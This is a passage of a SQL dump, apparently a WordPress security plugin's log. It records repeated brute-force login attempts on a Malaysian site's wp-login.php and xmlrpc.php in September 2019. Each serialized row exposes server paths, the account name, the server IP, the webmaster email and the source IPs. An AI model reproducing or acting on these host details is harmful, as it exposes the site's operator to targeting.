00:32:20',18252976,19551000,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(23969,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.132.124.6\";s:11:\"REMOTE_PORT\";s:5:\"38798\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8bwQavjo3v4tJT4rvLyQAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568611265.9962\";s:12:\"REQUEST_TIME\";s:10:\"1568611265\";}}','notice','2019-09-16 05:21:07','2019-09-16 05:21:06',17740064,19232456,'https://bintara.com.my/wp-login.php',1,0,'185.132.124.6'),(23970,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.132.124.6\";s:11:\"REMOTE_PORT\";s:5:\"39758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8bxQavjo3v4tJT4rvLzgAAAI8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568611269.1737\";s:12:\"REQUEST_TIME\";s:10:\"1568611269\";}}','notice','2019-09-16 05:21:10','2019-09-16 05:21:09',18255688,19555312,'https://bintara.com.my/xmlrpc.php',1,0,'185.132.124.6'),(23971,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.233.82\";s:11:\"REMOTE_PORT\";s:5:\"46794\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8eEQavjo3v4tJT4rvM8AAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568611858.1024\";s:12:\"REQUEST_TIME\";s:10:\"1568611858\";}}','notice','2019-09-16 05:30:59','2019-09-16 05:30:58',17736416,19226656,'https://bintara.com.my/wp-login.php',1,0,'188.165.233.82'),(23972,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.233.82\";s:11:\"REMOTE_PORT\";s:5:\"47342\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8eFeBXE2JRepjOtvmobAAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568611861.1048\";s:12:\"REQUEST_TIME\";s:10:\"1568611861\";}}','notice','2019-09-16 05:31:03','2019-09-16 05:31:01',18255456,19556360,'https://bintara.com.my/xmlrpc.php',1,0,'188.165.233.82'),(23973,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"40450\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8ftwavjo3v4tJT4rvNzQAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568612279.8208\";s:12:\"REQUEST_TIME\";s:10:\"1568612279\";}}','notice','2019-09-16 05:38:01','2019-09-16 05:38:00',17740144,19231272,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(23974,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"40938\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8fuuBXE2JRepjOtvmozwAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568612282.632\";s:12:\"REQUEST_TIME\";s:10:\"1568612282\";}}','notice','2019-09-16 05:38:04','2019-09-16 05:38:03',18255088,19554760,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(23975,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"38850\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8ikeBXE2JRepjOtvmpNAAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568613009.4213\";s:12:\"REQUEST_TIME\";s:10:\"1568613009\";}}','notice','2019-09-16 05:50:10','2019-09-16 05:50:09',17735944,19226528,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250'),(23976,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"39458\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8ilGCCaIOMm5l5jJE2bAAAAQo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568613012.674\";s:12:\"REQUEST_TIME\";s:10:\"1568613012\";}}','notice','2019-09-16 05:50:14','2019-09-16 05:50:13',18255880,19555072,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.133.250'),(23977,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.134.14\";s:11:\"REMOTE_PORT\";s:5:\"62607\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8jKgavjo3v4tJT4rvQZgAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568613162.8395\";s:12:\"REQUEST_TIME\";s:10:\"1568613162\";}}','notice','2019-09-16 05:52:44','2019-09-16 